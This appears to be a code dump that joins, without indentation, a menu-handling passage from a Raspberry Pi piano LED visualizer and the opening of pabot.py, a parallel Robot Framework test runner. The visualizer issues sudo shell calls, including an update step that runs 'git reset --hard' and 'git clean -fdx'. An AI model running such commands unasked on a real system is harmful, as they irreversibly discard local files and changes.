self.pointer_position += 1
self.cut_count = -6
self.show()
def enter_menu(self):
position = self.current_choice.replace(" ", "_")
if not self.DOMTree.getElementsByTagName(position):
self.change_settings(self.current_choice, self.currentlocation)
else:
self.currentlocation = self.current_choice
self.pointer_position = 0
self.cut_count = -6
self.show(self.current_choice)
def go_back(self):
if self.parent_menu != "data":
location_readable = self.currentlocation.replace("_", " ")
self.cut_count = -6
self.show(self.parent_menu, location_readable)
def render_message(self, title, message, delay=500):
self.image = Image.new("RGB", (self.LCD.width, self.LCD.height), self.background_color)
self.draw = ImageDraw.Draw(self.image)
self.draw.text((self.scale(3), self.scale(55)), title, fill=self.text_color, font=self.font)
self.draw.text((self.scale(3), self.scale(65)), message, fill=self.text_color, font=self.font)
self.LCD.LCD_ShowImage(self.image, 0, 0)
LCD_Config.Driver_Delay_ms(delay)
def render_screensaver(self, hour, date, cpu, cpu_average, ram, temp, cpu_history=[], upload=0, download=0,
card_space=0, local_ip="0.0.0.0"):
self.image = Image.new("RGB", (self.LCD.width, self.LCD.height), self.background_color)
self.draw = ImageDraw.Draw(self.image)
total_height = self.scale(1)
info_count = 0
height_left = 1
for key, value in self.screensaver_settings.items():
if str(key) == "time" and str(value) == "1":
total_height += self.scale(31)
elif str(key) == "date" and str(value) == "1":
total_height += self.scale(13)
elif str(key) == "cpu_chart" and str(value) == "1":
total_height += self.scale(35)
else:
if str(value) == "1":
info_count += 1
height_left = self.LCD.height - total_height
if info_count > 0:
info_height_font = height_left / info_count
else:
info_height_font = 0
top_offset = self.scale(2)
if self.screensaver_settings["time"] == "1":
fonthour = ImageFont.truetype(self.lcd_ttf, self.scale(31))
self.draw.text((self.scale(4), top_offset), hour, fill=self.text_color, font=fonthour)
top_offset += self.scale(31)
if self.screensaver_settings["date"] == "1":
font_date = ImageFont.truetype(self.lcd_ttf, self.scale(13))
self.draw.text((self.scale(34), top_offset), date, fill=self.text_color, font=font_date)
top_offset += self.scale(13)
if self.screensaver_settings["cpu_chart"] == "1":
previous_height = 0
c = self.scale(-5)
for cpu_chart in cpu_history:
height = self.scale(((100 - cpu_chart) * 35) / float(100))
self.draw.line([(c, top_offset + previous_height), (c + self.scale(5), top_offset + height)],
fill="Red", width=self.scale(1))
previous_height = height
c += self.scale(5)
top_offset += self.scale(35)
if info_height_font > self.scale(12):
info_height_font = self.scale(12)
font = ImageFont.truetype(self.lcd_ttf, int(info_height_font))
if self.screensaver_settings["cpu"] == "1":
self.draw.text((self.scale(1), top_offset), "CPU: " + str(cpu) + "% (" + str(cpu_average) + "%)",
fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["ram"] == "1":
self.draw.text((self.scale(1), top_offset), "RAM usage: " + str(ram) + "%", fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["temp"] == "1":
self.draw.text((self.scale(1), top_offset), "Temp: " + str(temp) + " C", fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["network_usage"] == "1":
if info_height_font > self.scale(11):
info_height_font_network = self.scale(11)
else:
info_height_font_network = int(info_height_font)
font_network = ImageFont.truetype(self.lcd_ttf,
int(info_height_font_network))
self.draw.text((self.scale(1), top_offset),
"D:" + str("{:.2f}".format(download)) + "Mb/s U:" + str("{:.2f}".format(upload)) + "Mb/s",
fill=self.text_color, font=font_network)
top_offset += info_height_font_network
if self.screensaver_settings["sd_card_space"] == "1":
self.draw.text((self.scale(1), top_offset),
"SD: " + str(round(card_space.used / (1024.0 ** 3), 1)) + "/" + str(
round(card_space.total / (1024.0 ** 3), 1)) + "(" + str(card_space.percent) + "%)",
fill=self.text_color, font=font)
top_offset += info_height_font
if self.screensaver_settings["local_ip"] == "1":
self.draw.text((self.scale(1), top_offset), "IP: " + str(local_ip), fill=self.text_color, font=font)
top_offset += info_height_font
self.LCD.LCD_ShowImage(self.image, 0, 0)
def change_settings(self, choice, location):
if location == "Text_Color":
self.text_color = choice
self.usersettings.change_setting_value("text_color", self.text_color)
if location == "Background_Color":
self.background_color = choice
self.usersettings.change_setting_value("background_color", self.background_color)
if self.text_color == self.background_color:
self.text_color = "Red"
self.usersettings.change_setting_value("text_color", self.text_color)
# Play MIDI
if location == "Choose_song":
self.saving.t = threading.Thread(target=play_midi, args=(choice, self.midiports, self.saving, self,
self.ledsettings, self.ledstrip))
self.saving.t.start()
if location == "Play_MIDI":
if choice == "Save MIDI":
now = datetime.datetime.now()
current_date = now.strftime("%Y-%m-%d %H:%M")
self.render_message("Recording stopped", "Saved as " + current_date, 2000)
self.saving.save(current_date)
self.update_songs()
if choice == "Start recording":
self.render_message("Recording started", "", 2000)
self.saving.start_recording()
if choice == "Cancel recording":
self.render_message("Recording canceled", "", 2000)
self.saving.cancel_recording()
if choice == "Stop playing":
self.saving.is_playing_midi.clear()
self.render_message("Playing stopped", "", 2000)
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
# Learn MIDI
if location == "Load_song":
self.learning.t = threading.Thread(target=self.learning.load_midi, args=(choice,))
self.learning.t.start()
self.go_back()
if location == "Learn_MIDI":
if choice == "Learning":
if not self.learning.is_started_midi:
self.learning.t = threading.Thread(target=self.learning.learn_midi)
self.learning.t.start()
else:
self.learning.is_started_midi = False
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
self.show(location)
if location == "Solid":
self.ledsettings.change_color_name(wc.name_to_rgb(choice))
self.ledsettings.color_mode = "Single"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Fading":
self.ledsettings.mode = "Fading"
self.usersettings.change_setting_value("mode", self.ledsettings.mode)
if choice == "Very fast":
self.ledsettings.fadingspeed = 50
elif choice == "Fast":
self.ledsettings.fadingspeed = 40
elif choice == "Medium":
self.ledsettings.fadingspeed = 20
elif choice == "Slow":
self.ledsettings.fadingspeed = 10
elif choice == "Very slow":
self.ledsettings.fadingspeed = 2
elif choice == "Instant":
self.ledsettings.fadingspeed = 1000
self.usersettings.change_setting_value("fadingspeed", self.ledsettings.fadingspeed)
if location == "Velocity":
self.ledsettings.mode = "Velocity"
self.usersettings.change_setting_value("mode", self.ledsettings.mode)
if choice == "Fast":
self.ledsettings.fadingspeed = 10
elif choice == "Medium":
self.ledsettings.fadingspeed = 8
elif choice == "Slow":
self.ledsettings.fadingspeed = 6
elif choice == "Very slow":
self.ledsettings.fadingspeed = 3
self.usersettings.change_setting_value("fadingspeed", self.ledsettings.fadingspeed)
if location == "Light_mode":
if choice == "Disabled":
self.ledsettings.mode = "Disabled"
else:
self.ledsettings.mode = "Normal"
self.usersettings.change_setting_value("mode", self.ledsettings.mode)
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
if location == "Input":
self.midiports.change_port("inport", choice)
if location == "Playback":
self.midiports.change_port("playport", choice)
if location == "Ports_Settings":
if choice == "Refresh ports" or choice == "Input" or choice == "Playback":
self.update_ports()
if choice == "Reset Bluetooth service":
self.render_message("Reseting BL service", "", 1000)
os.system("sudo systemctl restart btmidi.service")
if choice == "Connect ports":
self.render_message("Connecting ports", "", 2000)
self.midiports.connectall()
if choice == "Disconnect ports":
self.render_message("Disconnecting ports", "", 1000)
call("sudo aconnect -x", shell=True)
if location == "LED_animations":
if choice == "Theater Chase":
self.t = threading.Thread(target=theaterChase, args=(self.ledstrip.strip, Color(127, 127, 127),
self.ledsettings, self))
self.t.start()
if choice == "Theater Chase Rainbow":
self.t = threading.Thread(target=theaterChaseRainbow, args=(self.ledstrip.strip, self.ledsettings,
self, 5))
self.t.start()
if choice == "Sound of da police":
self.t = threading.Thread(target=sound_of_da_police, args=(self.ledstrip.strip, self.ledsettings,
self, 1))
self.t.start()
if choice == "Scanner":
self.t = threading.Thread(target=scanner, args=(self.ledstrip.strip, self.ledsettings, self, 1))
self.t.start()
if choice == "Clear":
fastColorWipe(self.ledstrip.strip, True, self.ledsettings)
if location == "Breathing":
if choice == "Fast":
self.t = threading.Thread(target=breathing, args=(self.ledstrip.strip, self.ledsettings, self, 5))
self.t.start()
if choice == "Medium":
self.t = threading.Thread(target=breathing, args=(self.ledstrip.strip, self.ledsettings, self, 10))
self.t.start()
if choice == "Slow":
self.t = threading.Thread(target=breathing, args=(self.ledstrip.strip, self.ledsettings, self, 25))
self.t.start()
if location == "Rainbow":
if choice == "Fast":
self.t = threading.Thread(target=rainbow, args=(self.ledstrip.strip, self.ledsettings, self, 2))
self.t.start()
if choice == "Medium":
self.t = threading.Thread(target=rainbow, args=(self.ledstrip.strip, self.ledsettings, self, 20))
self.t.start()
if choice == "Slow":
self.t = threading.Thread(target=rainbow, args=(self.ledstrip.strip, self.ledsettings, self, 50))
self.t.start()
if location == "Rainbow_Cycle":
if choice == "Fast":
self.t = threading.Thread(target=rainbowCycle, args=(self.ledstrip.strip, self.ledsettings, self, 1))
self.t.start()
if choice == "Medium":
self.t = threading.Thread(target=rainbowCycle, args=(self.ledstrip.strip, self.ledsettings, self, 20))
self.t.start()
if choice == "Slow":
self.t = threading.Thread(target=rainbowCycle, args=(self.ledstrip.strip, self.ledsettings, self, 50))
self.t.start()
if location == "LED_animations":
if choice == "Stop animation":
self.screensaver_is_running = False
if location == "Other_Settings":
if choice == "System Info":
screensaver(self, self.midiports, self.saving, self.ledstrip, self.ledsettings)
if location == "Rainbow_Colors":
self.ledsettings.color_mode = "Rainbow"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if choice == "Add Color":
self.ledsettings.addcolor()
if choice == "Add Note Offset":
self.ledsettings.add_note_offset()
self.update_led_note_offsets()
self.show()
if choice == "Append Note Offset":
self.ledsettings.append_note_offset()
self.update_led_note_offsets()
self.show()
if choice == "Delete":
if location.startswith('Offset'):
self.ledsettings.del_note_offset(location.replace('Offset','').split('_')[0])
self.update_led_note_offsets()
self.go_back()
self.show()
else:
self.ledsettings.deletecolor(location.replace('Color', ''))
if location == "Multicolor" and choice == "Confirm":
self.ledsettings.color_mode = "Multicolor"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Speed" and choice == "Confirm":
self.ledsettings.color_mode = "Speed"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Gradient" and choice == "Confirm":
self.ledsettings.color_mode = "Gradient"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if location == "Scale_Coloring" and choice == "Confirm":
self.ledsettings.color_mode = "Scale"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
print("color mode set to Scale")
if location == "Scale_key":
self.ledsettings.scale_key = self.ledsettings.scales.index(choice)
self.usersettings.change_setting_value("scale_key", self.ledsettings.scale_key)
if location == "Sequences":
if choice == "Update":
refresh_result = self.update_sequence_list()
if not refresh_result:
self.render_message("Something went wrong", "Make sure your sequence file is correct", 1500)
self.show()
else:
self.ledsettings.set_sequence(self.pointer_position, 0)
if location == "Sides_Color":
if choice == "Custom RGB":
self.ledsettings.adjacent_mode = "RGB"
if choice == "Same as main":
self.ledsettings.adjacent_mode = "Main"
if choice == "Off":
self.ledsettings.adjacent_mode = "Off"
self.usersettings.change_setting_value("adjacent_mode", self.ledsettings.adjacent_mode)
if location == "Reset_to_default_settings":
if choice == "Confirm":
self.usersettings.reset_to_default()
else:
self.go_back()
if location == "Update_visualizer":
if choice == "Confirm":
self.render_message("Updating...", "reboot is required", 5000)
call("sudo git reset --hard HEAD", shell=True)
call("sudo git checkout .", shell=True)
call("sudo git clean -fdx", shell=True)
call("sudo git pull origin master", shell=True)
self.go_back()
if location == "Shutdown":
if choice == "Confirm":
self.render_message("", "Shutting down...", 5000)
call("sudo /sbin/shutdown -h now", shell=True)
else:
self.go_back()
if location == "Reboot":
if choice == "Confirm":
self.render_message("", "Rebooting...", 5000)
call("sudo /sbin/reboot now", shell=True)
else:
self.go_back()
if location == "Skipped_notes":
self.ledsettings.skipped_notes = choice
self.usersettings.change_setting_value("skipped_notes", self.ledsettings.skipped_notes)
if location == "Content":
self.toggle_screensaver_settings(choice)
if location == "Led_animation":
self.led_animation = choice
self.usersettings.change_setting_value("led_animation", choice)
def change_value(self, value):
if value == "LEFT":
value = -1
elif value == "RIGHT":
value = 1
if self.currentlocation == "Brightness":
self.ledstrip.change_brightness(value * self.speed_multiplier)
if self.currentlocation == "Led_count":
self.ledstrip.change_led_count(value)
if self.currentlocation == "Shift":
self.ledstrip.change_shift(value)
if self.currentlocation == "Reverse":
self.ledstrip.change_reverse(value)
if self.currentlocation == "Backlight_Brightness":
if self.current_choice == "Power":
self.ledsettings.change_backlight_brightness(value * self.speed_multiplier)
if self.currentlocation == "Backlight_Color":
self.ledsettings.change_backlight_color(self.current_choice, value * self.speed_multiplier)
if self.currentlocation == "Custom_RGB":
self.ledsettings.change_adjacent_color(self.current_choice, value * self.speed_multiplier)
if self.currentlocation == "RGB":
self.ledsettings.change_color(self.current_choice, value * self.speed_multiplier)
self.ledsettings.color_mode = "Single"
self.usersettings.change_setting_value("color_mode", self.ledsettings.color_mode)
if "RGB_Color" in self.currentlocation:
self.ledsettings.change_multicolor(self.current_choice, self.currentlocation, value * self.speed_multiplier)
if "Key_range" in self.currentlocation:
self.ledsettings.change_multicolor_range(self.current_choice, self.currentlocation,
value * self.speed_multiplier)
self.ledsettings.light_keys_in_range(self.currentlocation)
if self.current_choice == "LED Number" and self.currentlocation.startswith("Offset"):
self.ledsettings.update_note_offset_lcd(self.current_choice, self.currentlocation, value * self.speed_multiplier)
if self.current_choice == "LED Offset" and self.currentlocation.startswith("Offset"):
self.ledsettings.update_note_offset_lcd(self.current_choice, self.currentlocation, value * self.speed_multiplier)
if self.current_choice == "Offset":
self.ledsettings.rainbow_offset = self.ledsettings.rainbow_offset + value * 5 * self.speed_multiplier
if self.current_choice == "Scale":
self.ledsettings.rainbow_scale = self.ledsettings.rainbow_scale + value * 5 * self.speed_multiplier
if self.current_choice == "Timeshift":
self.ledsettings.rainbow_timeshift = self.ledsettings.rainbow_timeshift + value * self.speed_multiplier
if self.currentlocation == "Start_delay":
self.screensaver_delay = int(self.screensaver_delay) + (value * self.speed_multiplier)
if self.screensaver_delay < 0:
self.screensaver_delay = 0
self.usersettings.change_setting_value("screensaver_delay", self.screensaver_delay)
if self.currentlocation == "Turn_off_screen_delay":
self.screen_off_delay = int(self.screen_off_delay) + (value * self.speed_multiplier)
if self.screen_off_delay < 0:
self.screen_off_delay = 0
self.usersettings.change_setting_value("screen_off_delay", self.screen_off_delay)
if self.currentlocation == "Led_animation_delay":
self.led_animation_delay = int(self.led_animation_delay) + (value * self.speed_multiplier)
if self.led_animation_delay < 0:
self.led_animation_delay = 0
self.usersettings.change_setting_value("led_animation_delay", self.led_animation_delay)
if self.currentlocation == "Color_for_slow_speed":
self.ledsettings.speed_slowest[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.speed_slowest[self.current_choice.lower()] > 255:
self.ledsettings.speed_slowest[self.current_choice.lower()] = 255
if self.ledsettings.speed_slowest[self.current_choice.lower()] < 0:
self.ledsettings.speed_slowest[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("speed_slowest_" + self.current_choice.lower(),
self.ledsettings.speed_slowest[self.current_choice.lower()])
if self.currentlocation == "Color_for_fast_speed":
self.ledsettings.speed_fastest[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.speed_fastest[self.current_choice.lower()] > 255:
self.ledsettings.speed_fastest[self.current_choice.lower()] = 255
if self.ledsettings.speed_fastest[self.current_choice.lower()] < 0:
self.ledsettings.speed_fastest[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("speed_fastest_" + self.current_choice.lower(),
self.ledsettings.speed_fastest[self.current_choice.lower()])
if self.currentlocation == "Period":
self.ledsettings.speed_period_in_seconds = round(self.ledsettings.speed_period_in_seconds + (value * .1) *
self.speed_multiplier, 1)
if self.ledsettings.speed_period_in_seconds < 0.1:
self.ledsettings.speed_period_in_seconds = 0.1
self.usersettings.change_setting_value("speed_period_in_seconds", self.ledsettings.speed_period_in_seconds)
if self.currentlocation == "Max_notes_in_period":
self.ledsettings.speed_max_notes += value * self.speed_multiplier
if self.ledsettings.speed_max_notes < 2:
self.ledsettings.speed_max_notes = 2
self.usersettings.change_setting_value("speed_max_notes", self.ledsettings.speed_max_notes)
if self.currentlocation == "Gradient_start":
self.ledsettings.gradient_start[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.gradient_start[self.current_choice.lower()] > 255:
self.ledsettings.gradient_start[self.current_choice.lower()] = 255
if self.ledsettings.gradient_start[self.current_choice.lower()] < 0:
self.ledsettings.gradient_start[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("gradient_start_" + self.current_choice.lower(),
self.ledsettings.gradient_start[self.current_choice.lower()])
if self.currentlocation == "Gradient_end":
self.ledsettings.gradient_end[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.gradient_end[self.current_choice.lower()] > 255:
self.ledsettings.gradient_end[self.current_choice.lower()] = 255
if self.ledsettings.gradient_end[self.current_choice.lower()] < 0:
self.ledsettings.gradient_end[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("gradient_end_" + self.current_choice.lower(),
self.ledsettings.gradient_end[self.current_choice.lower()])
if self.currentlocation == "Color_in_scale":
self.ledsettings.key_in_scale[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.key_in_scale[self.current_choice.lower()] > 255:
self.ledsettings.key_in_scale[self.current_choice.lower()] = 255
if self.ledsettings.key_in_scale[self.current_choice.lower()] < 0:
self.ledsettings.key_in_scale[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("key_in_scale_" + self.current_choice.lower(),
self.ledsettings.key_in_scale[self.current_choice.lower()])
if self.currentlocation == "Color_not_in_scale":
self.ledsettings.key_not_in_scale[self.current_choice.lower()] += value * self.speed_multiplier
if self.ledsettings.key_not_in_scale[self.current_choice.lower()] > 255:
self.ledsettings.key_not_in_scale[self.current_choice.lower()] = 255
if self.ledsettings.key_not_in_scale[self.current_choice.lower()] < 0:
self.ledsettings.key_not_in_scale[self.current_choice.lower()] = 0
self.usersettings.change_setting_value("key_not_in_scale_" + self.current_choice.lower(),
self.ledsettings.key_not_in_scale[self.current_choice.lower()])
# Learn MIDI
if self.currentlocation == "Learn_MIDI":
if self.current_choice == "Practice":
self.learning.change_practice(value)
if self.current_choice == "Hands":
self.learning.change_hands(value)
if self.current_choice == "Mute hand":
self.learning.change_mute_hand(value)
if self.current_choice == "Start point":
self.learning.change_start_point(value)
if self.current_choice == "End point":
self.learning.change_end_point(value)
if self.current_choice == "Set tempo":
self.learning.change_set_tempo(value)
if self.current_choice == "Hand color R":
self.learning.change_hand_color(value, 'RIGHT')
if self.current_choice == "Hand color L":
self.learning.change_hand_color(value, 'LEFT')
self.show()
def speed_change(self):
if self.speed_multiplier == 10:
self.speed_multiplier = 1
elif self.speed_multiplier == 1:
self.speed_multiplier = 10
|
pabot.py
|
#!/usr/bin/env python
# Copyright 2014->future! Mikko Korpela
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# partly based on work by Nokia Solutions and Networks Oyj
"""A parallel executor for Robot Framework test cases.
Version 2.0.1
Supports all Robot Framework command line options and also the following
options (these must come before the normal RF options):
--verbose
more output
--command [ACTUAL COMMANDS TO START ROBOT EXECUTOR] --end-command
RF script for situations where pybot is not used directly
--processes [NUMBER OF PROCESSES]
How many parallel executors to use (default is the maximum of 2 and the CPU count)
--testlevelsplit
Split execution on the test level instead of the default suite level.
If .pabotsuitenames contains both tests and suites, this
will only affect new suites and split only them.
Leaving this flag out when the .pabotsuitenames file contains both
suites and tests will likewise only affect new suites and
add them as suite files.
--resourcefile [FILEPATH]
Indicator for a file that can contain shared variables for
distributing resources.
--pabotlib
Start PabotLib remote server. This enables locking and resource
distribution between parallel test executions.
--pabotlibhost [HOSTNAME]
Host name of the PabotLib remote server (default is 127.0.0.1)
--pabotlibport [PORT]
Port number of the PabotLib remote server (default is 8270)
--ordering [FILE PATH]
Optionally give execution order from a file.
--suitesfrom [FILEPATH TO OUTPUTXML]
Optionally read suites from an output.xml file. Failed suites will run
first and longer-running ones will be executed before shorter ones.
--argumentfile[INTEGER] [FILEPATH]
Run the same suite with multiple argumentfile options.
For example "--argumentfile1 arg1.txt --argumentfile2 arg2.txt".
Copyright 2019 Mikko Korpela - Apache 2 License
"""
from __future__ import absolute_import, print_function
import datetime
import hashlib
import os
import random
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import uuid
from collections import namedtuple
from contextlib import closing
from glob import glob
from io import BytesIO, StringIO
from multiprocessing.pool import ThreadPool
from robot import __version__ as ROBOT_VERSION
from robot import rebot
from robot.api import ExecutionResult
from robot.conf import RobotSettings
from robot.errors import DataError, Information
from robot.libraries.Remote import Remote
from robot.model import ModelModifier
from robot.result.visitor import ResultVisitor
from robot.run import USAGE
from robot.running import TestSuiteBuilder
from robot.utils import PY2, SYSTEM_ENCODING, ArgumentParser, is_unicode
from . import pabotlib
from .arguments import parse_args, parse_execution_item_line
from .clientwrapper import make_order
from .execution_items import (
DynamicSuiteItem,
ExecutionItem,
GroupEndItem,
GroupItem,
GroupStartItem,
HivedItem,
SuiteItem,
SuiteItems,
TestItem,
)
from .result_merger import merge
try:
import queue # type: ignore
except ImportError:
import Queue as queue # type: ignore
try:
from shlex import quote # type: ignore
except ImportError:
from pipes import quote # type: ignore
from typing import IO, Any, Dict, List, Optional, Tuple, Union
CTRL_C_PRESSED = False
MESSAGE_QUEUE = queue.Queue()
EXECUTION_POOL_IDS = [] # type: List[int]
EXECUTION_POOL_ID_LOCK = threading.Lock()
POPEN_LOCK = threading.Lock()
_PABOTLIBURI = "127.0.0.1:8270"
_PABOTLIBPROCESS = None # type: Optional[subprocess.Popen]
_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE = (
"!#$^&*?[(){}<>~;'`\\|= \t\n" # does not contain '"'
)
_BAD_CHARS_SET = set(_BOURNELIKE_SHELL_BAD_CHARS_WITHOUT_DQUOTE)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
_ABNORMAL_EXIT_HAPPENED = False
_COMPLETED_LOCK = threading.Lock()
_NOT_COMPLETED_INDEXES = [] # type: List[int]
_ROBOT_EXTENSIONS = [
".html",
".htm",
".xhtml",
".tsv",
".rst",
".rest",
".txt",
".robot",
]
_ALL_ELAPSED = [] # type: List[Union[int, float]]
class Color:
SUPPORTED_OSES = ["posix"]
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"
YELLOW = "\033[93m"
def _mapOptionalQuote(command_args):
# type: (List[str]) -> List[str]
if os.name == "posix":
return [quote(arg) for arg in command_args]
return [
arg if set(arg).isdisjoint(_BAD_CHARS_SET) else '"%s"' % arg
for arg in command_args
]
def execute_and_wait_with(item):
# type: ('QueueItem') -> None
global CTRL_C_PRESSED, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
is_last = _NUMBER_OF_ITEMS_TO_BE_EXECUTED == 1
_NUMBER_OF_ITEMS_TO_BE_EXECUTED -= 1
if CTRL_C_PRESSED:
# Keyboard interrupt has happened!
return
time.sleep(0)
try:
datasources = [
d.encode("utf-8") if PY2 and is_unicode(d) else d for d in item.datasources
]
caller_id = uuid.uuid4().hex
name = item.display_name
outs_dir = os.path.join(item.outs_dir, item.argfile_index, str(item.index))
os.makedirs(outs_dir)
cmd = _create_command_for_execution(
caller_id, datasources, is_last, item, outs_dir
)
if item.hive:
_hived_execute(
item.hive,
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
)
else:
_try_execute_and_wait(
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
item.execution_item.type != "test",
)
outputxml_preprocessing(
item.options, outs_dir, name, item.verbose, _make_id(), caller_id
)
except:
_write(traceback.format_exc())
def _create_command_for_execution(caller_id, datasources, is_last, item, outs_dir):
options = item.options.copy()
if item.command == ['robot'] and not options["listener"]:
options["listener"] = ["RobotStackTracer"]
cmd = (
item.command
+ _options_for_custom_executor(
options,
outs_dir,
item.execution_item,
item.argfile,
caller_id,
is_last,
item.index,
item.last_level,
item.processes,
)
+ datasources
)
return _mapOptionalQuote(cmd)
def _pabotlib_in_use():
return _PABOTLIBPROCESS or _PABOTLIBURI != "127.0.0.1:8270"
def _hived_execute(
hive, cmd, outs_dir, item_name, verbose, pool_id, caller_id, my_index=-1
):
plib = None
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
make_order(hive, " ".join(cmd), outs_dir)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
def _try_execute_and_wait(
cmd,
outs_dir,
item_name,
verbose,
pool_id,
caller_id,
my_index=-1,
show_stdout_on_failure=False,
):
# type: (List[str], str, str, bool, int, str, int, bool) -> None
plib = None
is_ignored = False
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
with open(os.path.join(outs_dir, cmd[0] + "_stdout.out"), "w") as stdout:
with open(os.path.join(outs_dir, cmd[0] + "_stderr.out"), "w") as stderr:
process, (rc, elapsed) = _run(
cmd, stderr, stdout, item_name, verbose, pool_id, my_index
)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
is_ignored = _is_ignored(plib, caller_id)
if is_ignored and os.path.isdir(outs_dir):
shutil.rmtree(outs_dir)
# Thread-safe list append
_ALL_ELAPSED.append(elapsed)
_result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
)
def _result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
):
if is_ignored:
_write_with_id(
process,
pool_id,
my_index,
_execution_ignored_message(item_name, stdout, stderr, elapsed, verbose),
)
elif rc != 0:
_write_with_id(
process,
pool_id,
my_index,
_execution_failed_message(
item_name, stdout, stderr, rc, verbose or show_stdout_on_failure
),
Color.RED,
)
else:
_write_with_id(
process,
pool_id,
my_index,
_execution_passed_message(item_name, stdout, stderr, elapsed, verbose),
Color.GREEN,
)
def _is_ignored(plib, caller_id): # type: (Remote, str) -> bool
return plib.run_keyword("is_ignored_execution", [caller_id], {})
# optionally invoke rebot to preprocess output.xml so that --removekeywords
# and --flattenkeywords get applied => result: much smaller output.xml files + faster merging + avoids MemoryErrors
def outputxml_preprocessing(options, outs_dir, item_name, verbose, pool_id, caller_id):
# type: (Dict[str, Any], str, str, bool, int, str) -> None
try:
remove_keywords = options["removekeywords"]
flatten_keywords = options["flattenkeywords"]
if not remove_keywords and not flatten_keywords:
# => no preprocessing needed if no removekeywords or flattenkeywords present
return
remove_keywords_args = [] # type: List[str]
flatten_keywords_args = [] # type: List[str]
for k in remove_keywords:
remove_keywords_args += ["--removekeywords", k]
for k in flatten_keywords:
flatten_keywords_args += ["--flattenkeywords", k]
outputxmlfile = os.path.join(outs_dir, "output.xml")
oldsize = os.path.getsize(outputxmlfile)
cmd = (
[
"rebot",
"--log",
"NONE",
"--report",
"NONE",
"--xunit",
"NONE",
"--consolecolors",
"off",
"--NoStatusRC",
]
+ remove_keywords_args
+ flatten_keywords_args
+ ["--output", outputxmlfile, outputxmlfile]
)
cmd = _mapOptionalQuote(cmd)
_try_execute_and_wait(
cmd,
outs_dir,
"preprocessing output.xml on " + item_name,
verbose,
pool_id,
caller_id,
)
newsize = os.path.getsize(outputxmlfile)
perc = 100 * newsize / oldsize
if verbose:
_write(
"%s [main] [%s] Filesize reduced from %s to %s (%0.2f%%) for file %s"
% (
datetime.datetime.now(),
pool_id,
oldsize,
newsize,
perc,
outputxmlfile,
)
)
except:
print(sys.exc_info())
def _write_with_id(process, pool_id, item_index, message, color=None, timestamp=None):
timestamp = timestamp or datetime.datetime.now()
_write(
"%s [PID:%s] [%s] [ID:%s] %s"
% (timestamp, process.pid, pool_id, item_index, message),
color,
)
def _make_id(): # type: () -> int
global EXECUTION_POOL_IDS, EXECUTION_POOL_ID_LOCK
thread_id = threading.current_thread().ident
assert thread_id is not None
with EXECUTION_POOL_ID_LOCK:
if thread_id not in EXECUTION_POOL_IDS:
EXECUTION_POOL_IDS += [thread_id]
return EXECUTION_POOL_IDS.index(thread_id)
def _increase_completed(plib, my_index):
# type: (Remote, int) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
if my_index not in _NOT_COMPLETED_INDEXES:
return
_NOT_COMPLETED_INDEXES.remove(my_index)
if _NOT_COMPLETED_INDEXES:
plib.run_keyword(
"set_parallel_value_for_key",
[
pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE,
_NOT_COMPLETED_INDEXES[0],
],
{},
)
if len(_NOT_COMPLETED_INDEXES) == 1:
plib.run_keyword(
"set_parallel_value_for_key", ["pabot_only_last_executing", 1], {}
)
def _run(command, stderr, stdout, item_name, verbose, pool_id, item_index):
# type: (List[str], IO[Any], IO[Any], str, bool, int, int) -> Tuple[Union[subprocess.Popen[bytes], subprocess.Popen], Tuple[int, float]]
timestamp = datetime.datetime.now()
cmd = " ".join(command)
if PY2:
cmd = cmd.decode("utf-8").encode(SYSTEM_ENCODING)
# avoid hitting https://bugs.python.org/issue10394
with POPEN_LOCK:
process = subprocess.Popen(cmd, shell=True, stderr=stderr, stdout=stdout)
if verbose:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING PARALLEL %s with command:\n%s" % (item_name, cmd),
